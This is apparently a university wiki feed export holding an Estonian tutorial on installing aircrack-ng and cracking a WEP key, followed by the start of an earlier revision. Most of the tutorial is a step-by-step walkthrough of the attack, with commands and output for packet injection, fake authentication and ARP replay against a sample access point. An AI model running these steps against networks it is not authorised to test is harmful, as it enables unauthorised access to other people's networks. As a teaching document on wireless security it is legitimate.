		<updated>2015-05-25T20:24:39Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Eeldused */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89339</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89339"/>
		<updated>2015-05-25T20:13:50Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Kokkuvõte */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
